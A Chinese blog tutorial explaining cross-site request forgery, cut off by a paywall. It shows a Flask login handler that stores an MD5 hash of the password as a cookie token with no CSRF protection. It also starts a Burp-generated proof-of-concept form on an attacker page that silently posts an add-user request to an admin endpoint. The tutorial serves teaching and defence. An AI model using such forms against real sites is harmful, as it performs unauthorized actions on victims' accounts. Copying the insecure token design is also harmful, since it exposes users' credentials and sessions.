CSRF漏洞剖析

已于 2023-06-11 23:30:19 修改
阅读量851 收藏 4
点赞数
分类专栏: 漏洞分析 文章标签: csrf 安全 前端
于 2022-12-04 19:58:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zmzsg100/article/details/128176234
版权

想必大家对CSRF并不陌生,英文全名叫Cross-site request forgery,翻译过来就是跨站点请求伪造。简单的理解就是从B站点来请求A站点的某个动作。

这里最最关键的因素是令牌。用户在A站点登陆成功后,服务端颁发令牌并存储到浏览器中。客户端存储令牌方式主要2种:Cookie、localstorage

只有令牌存储在Cookie中才能利用CSRF,至于为什么到后面再讲。

首先我先演示一下第一种场景:MVC架构,站点:api.hack.me

Controller层代码如下

@app.route('/login_cookie_form',methods=["POST","GET"])
def login_cookie_form():
    if request.method == "POST":
        username = request.form.get("username")
        password = request.form.get('password')
        print(username,password)
        token = hashlib.new('md5', password.encode('utf-8')).hexdigest()
        try:
            res = make_response('set-cookie')
            res.set_cookie("user",token,samesite=None,secure=True)
            return res
        except Exception as e:
            print(e)
    return render_template('login_cookie.html')

View层代码如下

<html>
<head>
    <title>Login Form</title>
    <form action="/login_cookie_form" method="post">
        用户名:<input type="text" name="username">
        密码:<input type="password" name="password">
        <button type="submit">点击登陆</button>
    </form>
</head>
</html>

登陆成功后, 服务端给客户端颁发令牌,存储到浏览器Cookie中,Domain为api.hack.me 

 

可以看到添加成功了,那么接下来可以实施CSRF攻击了

这里攻击者构造了一个页面 http://attack.me/fake_add_user_form

页面内容如下

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://api.hack.me/admin/add_user_form" method="POST">
      <input type="hidden" name="username" value="helloworld" />
      <input type&
最低0.47元/天 解锁文章
信息安全笔记
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
CSRF漏洞的靶场实验
09-19
3. 分析"74cms-csrf漏洞.docx"文档,了解存在的CSRF漏洞点。通常,CSRF漏洞出现在那些没有进行CSRF防护或者防护不足的表单提交处。 4. 构造恶意请求:根据文档中提供的信息,模拟一个恶意链接或表单,这个请求在...
什么是CSRF?为什么CSRF Token写在COOKIE里面?
积微成著
07-01 9338
自制工具翰华Box:https://hanhuabox.lanzous.com/b00zjq9uf 翰华Box - 开发日志:https://blog.csdn.net/qq_41517936/article/details/106409456 跨站请求伪造(英语:Cross-site request forgery),也被称为one-click attack或者session riding,通常缩写为CSRF或者XSRF, 是一种挟制用户在当前已登录的Web应用程序上执行非本...
了解cookie以及cookie跨站点伪造攻击(CSRF)
我的专栏
05-15 2675
背景知识: 很久很久以前,Web基本上就是文档的浏览而已,既然是浏览,作为服务器,不需要纪录谁在某一段时间里浏览了什么 文档,每次请求都是一个新的Http协议,就是请求加响应,尤其是我不用记住是谁刚刚发了HTTP请求,每个请求对我 来说是全新的,这段时间很嗨皮。 但是,随着交互式Web应用的兴起,像在线购物网站,需要登录的网站等等,马上就面临一个问题,那就是要管理回话, 必须记住那些人登录系统,那些人往自己的购物车中放商品,也就是说我必须把每个人区分开,这就是一个不小的挑战, 因为HTTP请求是无状态.
Apache CXF Aegis databinding SSRF 高危漏洞修复
最新发布
JAVA领域优质创作者,基于分片网络查询方法专利发明者。
05-23 1048
2、Spring Web UriComponentsBuilder URL解析不当漏洞修复。Spring Web UriComponentsBuilder URL解析不当漏洞。1、Apache CXF Aegis databinding SSRF漏洞修复。Apache CXF Aegis databinding SSRF漏洞。进入服务器搜索 databinding。三、maven包升级版本查询。如搜索spring-boot。找到了spring-web。发现版本是3.1.6。果断升级到3.5.8。
CookieCSRF(XSRF)
zollty的专栏
08-25 3074
本文是《Session和Cookie原理》的续篇。 在上一篇中,详细介绍了Cookie的原理。 下面介绍,如何Cookie的跨站共享,及CSRF(Cross-Site Request Forgery,跨网站请求伪造)攻击。 请先阅读《HTTP访问控制(CORS)》一文,以便对跨网站请求有一个初步了解。在这篇文章中提到的一点十分关键: “Fetch 与 CORS 的一个有趣的特性是,可以基于 HTTP cookies 和 HTTP 认证信息发送身份凭证。一般而言,对于跨域 XMLHttpR..
Cookies在XSS和CSRF防御中的作用
Wang的专栏
06-08 435
nodejs响应中设置加密后cookies信息。1 ) 通过cookie存储用户签名。nodejs请求中验证用户凭证。nodejs中处理用户凭证。用户ID+签名(推荐)
「网络安全渗透」如果你还不懂CSRF?这一篇让你彻底掌握
wangluoanquan111的博客
06-16 1867
相对应的,对方的邮箱也会变成我们 CSRF Poc 所指定的,这样子一来,我就可以通过 “忘记密码” 这种服务来获取他账户的权限了。小明由于刚刚就登陆了Gmail,所以这个请求发送时,携带着小明的登录凭证(Cookie),Gmail的后台接收到请求,验证了确实有小明的登录凭证,于是成功给小明配置了过滤器。小明由于刚刚就登陆了Gmail,所以这个请求发送时,携带着小明的登录凭证(Cookie),Gmail的后台接收到请求,验证了确实有小明的登录凭证,于是成功给小明配置了过滤器。一切似乎什么都没有发生……
hucart-含有CSRF漏洞的源码.zip
12-31
通过分析和修复hucart的CSRF漏洞,开发者可以深入理解CSRF攻击的机制,提升Web应用的安全性。同时,也可以了解如何在实际项目中运用上述防范策略,以保护用户的数据安全。 总之,理解和掌握CSRF漏洞对于任何Web...
CSRF漏洞token防御介绍-01
09-15
1. 漏洞修补逻辑分析:首先,需要分析 CSRF 漏洞的逻辑,了解攻击者如何伪造用户的请求。了解攻击者的攻击方式,可以更好地防御 CSRF 漏洞。 2. 简单代码模型分析:其次,需要了解服务器如何验证用户的请求,了解...
第二节 无防护的CSRF漏洞利用-01
09-15
无防护的CSRF漏洞利用 CSRF(Cross-Site Request Forgery,跨站请求伪造)是一种常见的Web应用安全漏洞,攻击者可以通过欺骗用户在当前已登录的Web应用上执行非法操作。今天,我们将深入探讨无防护的CSRF漏洞利用,...
Web应用程序常见漏洞CSRF的入侵检测与防范
03-01
互联网的安全问题一直存在,并且在可预见的未来中没有消弭的迹象...跨站请求伪造(CSRF)的是Web应用程序一种常见的漏洞,其攻击特性是危害性大但非常隐蔽,尤其是在大量Web2.0技术的应用的背景下,CSRF攻击完全可以在
CSRF漏洞详解
xcxhzjl的博客
11-19 3154
一、CSRF漏洞原理 1、基本原理 CSRF(Cross-site Request Forgery,跨站请求伪造)是一种针对网站的恶意利用。 CSRF攻击可以利用用户已经登陆或已经授权的状态,伪造合法用户发出请求给受信任的网点,从而实现在未授权的情况下执行一些特权操作。 CSRF与XSS听起来很像,但攻击方式完全不同。XSS攻击是利用受信任的站点攻击客户端用户,而CSRF是伪装成受信任的用户攻击受信任的站点。 2、流程图 3、条件 ●用户成功登陆了网站系统,能执行授权的功能 ●目标用户访
通俗易懂的csrf漏洞(token为什么能放cookie)
qq_39739740的博客
09-07 971
csrf漏洞即跨站请求伪造,通俗来说即攻击者通过发送第三方网站(乱七八糟的网站)给你,然而这个网站中隐藏了对你已经登陆过的网站的一些请求,也就是含有你的身份认证信息,从而可以假扮你去操作一些事情。假设微博的关注功能存在csrf漏洞那么这就表示给用户小明点了个关注。。注意:实际http请求中是携带了你cookie(即身份信息)的,总不能还没登陆微博就能点关注吧这时,如果有人给你发了一个恶意链接****这个网站里头有一个很吸引你的图或者什么话题,然而这个话题或图的链接。
被问出花了的 CookieCSRF
javagty6778的博客
03-05 319
我们知道 http 是无状态的,也就是说用户登录后进行其他操作时服务端无法知道用户是否已登录。有机灵的小伙伴很快想到,把用户登录信息存起来后面的接口都带上不就可以了?但 Cookie 出现前浏览器端还没有本地存储方法,JS 中在强的变量也抵不过浏览器的一次刷新。就这样Cookie\color{red}{ Cookie }Cookie 亮相了。
一文带你了解CSRFCookie、Session和token,JWT之间的关系
大河之犬的博客
09-15 1049
所以存在被盗用的风险。比如在银行里转账,银行页面上的转账请求链接,是银行服务器那边生成的链接,所以那边是可以在请求里面就加上你客户端的token的,但是钓鱼网站无法得到你的token,钓鱼网站仿造的转账请求链接是无法把token写入的,所以就无法生效。意思是,客户端打开了钓鱼网站,却在不知情的情况下,发送了一个请求给淘宝,这个请求有可能是转账,付款等等,因为是客户端发出的请求,所以客户端会带上自己的cookie,这样就可以请求成功。基于token的验证是无状态的,这也许是它相对cookie来说最大的优点。
cookies为什么会有csrf风险,为什么token可以避免
qq_44705614的博客
03-16 538
如果使用token,因为token可以不放在cookie里面,在发送请求时经过前端程序处理才可以把token放到请求参数中,所以在直接请求伪造的地址时,浏览器会自动让请求携带cookie,但是没经过前端的操作,请求不会携带token,服务器没有验证token,就会拦截不服务。当浏览器发送请求且浏览器存在 Cookie 且同源不跨域时,浏览器会自动在请求头携带上 Cookie 数据。所以浏览器对csrf背锅,即利用的是网站对用户网页浏览器的信任。CSRF 利用的是网站对用户网页浏览器的信任。
Nginx的相关配置及漏洞
weixin_54347738的博客
08-11 487
通过证书申请文件拿着私钥去申请证书。(1)生成key私钥密码(随机填写):123456(2)拿着私钥构造证书申请文件(3)证书申请文件+私钥去申请证书(4)证书的使用在需要使用证书的nginx配置文件的server节点里加入以下配置:#https默认使用443端口 server_name 0.0.0.0;#将0.0.0.0替换为你的网站域名或ipssl on;ADH:!
csrf攻击和xss攻击,cookie的理解
weixin_50146421的博客
06-12 168
什么是cookiecookie:其实cookie是一个很小的文本文件,是浏览器储存在用户的机器上的。Cookie是纯文本,没有可执行代码譬如我们浏览一个网站时,页面会显示上次你浏览的状态,以及你的登录情况,爱好等等,那么为什么浏览器会记住我们呢?这里cookie就起到了大作用,当客户端第一次访问网页时,客户端会发送一个请求访问包给服务器,当服务器收到请求访问包时会给客户端反馈一个带cookie的响应包,这个包中包含客户端的用户名,密码等一些标志性信息。
cookie验证不安全易遭到CSRF攻击
邓盛余
08-29 2517
一、CSRF介绍 CSRF攻击的全称是跨站请求伪造( cross site request forgery),是一种对网站的恶意利用,尽管听起来跟XSS跨站脚本攻击有点相似,但事实上CSRF与XSS差别很大,XSS利用的是站点内的信任用户,而CSRF则是通过伪装来自受信任用户的请求来利用受信任的网站。你可以这么理解CSRF攻击:攻击者盗用了你的身份,以你的名义向第三方网站发送恶意请求。 CRSF能...
理解CSRF漏洞:原理、危害与防范
CSRF漏洞的核心在于网站对用户身份验证的依赖过于简单,通常基于持久的Cookie。当用户登录网站后,Cookie会被设置并保持,即使用户在未注销的情况下关闭浏览器,再次访问时仍被视为已登录状态。攻击者通过构造恶意...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

信息安全笔记

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值